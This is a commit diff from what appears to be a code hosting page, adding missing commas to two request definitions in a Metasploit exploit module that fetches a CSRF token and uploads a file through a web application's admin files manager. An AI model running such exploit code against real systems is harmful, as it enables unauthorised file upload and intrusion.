parent
6f6ad86e2c
commit
bc33078e01
|
@ -134,7 +134,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
# Request for CSRF token for file upload.
|
||||
res = send_request_cgi({
|
||||
'uri' => normalize_uri(uri, 'admin', '/index.php'),
|
||||
'vars_get' => 'id=filesmanager'
|
||||
'vars_get' => 'id=filesmanager',
|
||||
'method' => 'GET',
|
||||
'cookie' => cookies,
|
||||
})
|
||||
|
@ -155,7 +155,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
# Lets Send Upload request.
|
||||
res = send_request_cgi({
|
||||
'uri' => normalize_uri(uri, 'admin', '/index.php'),
|
||||
'vars_get' => 'id=filesmanager'
|
||||
'vars_get' => 'id=filesmanager',
|
||||
'method' => 'POST',
|
||||
'cookie' => cookies,
|
||||
'Connection' => 'close',
|
||||
|
|
Loading…
Reference in New Issue